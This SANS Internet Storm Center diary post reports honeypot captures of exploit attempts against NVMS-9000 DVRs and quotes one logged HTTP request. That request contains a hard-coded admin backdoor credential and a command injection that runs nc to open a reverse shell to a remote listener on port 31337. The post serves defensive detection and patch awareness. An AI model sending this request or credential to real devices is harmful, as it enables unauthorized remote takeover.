Since the beginning of October, my honeypot has been capturing numerous scans for DVR model NVMS-9000 which a PoC was released last year describing a “Stack Overflow in Base64 Authorization”[1].

DVR Activity NVMS-9000

The traffic captured by my honeypot matches the PoC with the same Base 64 username and password (admin:{12213BD1-69C7-4862-843D-260500D1DA40}) attempting to fork a reverse shell to redirect the traffic to a remote listener on port TCP 31337. The vendor advisory is posted here where they indicated a firmware update is available.

Here is an example of traffic you could expect to see in your logs:

20191020-025738: 192.168.25.9:80-84.150.176.93:34656 data ‘POST /editBlackAndWhiteList HTTP/1.1rnAccept-Encoding: identityrnContent-Length: 586rnAccept-Language: en-usrnHost: XX.71.48.119rnAccept: */*rnUser-Agent: ApiToolrnConnection: closernCache-Control: max-age=0rnContent-Type: text/xmlrnAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=rnrn<request version="1.0" systemType="NVMS-9000” clientType=”WEB”>refuseallowipiprangemactruerefusetrueip$(nc${IFS}XX.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)’

[1] https://raw.githubusercontent.com/mcw0/PoC/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
[2] http://en.tvt.net.cn/news/227.html
[3] https://manualzz.com/doc/9541049/cms-nvms-9000-presentation

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.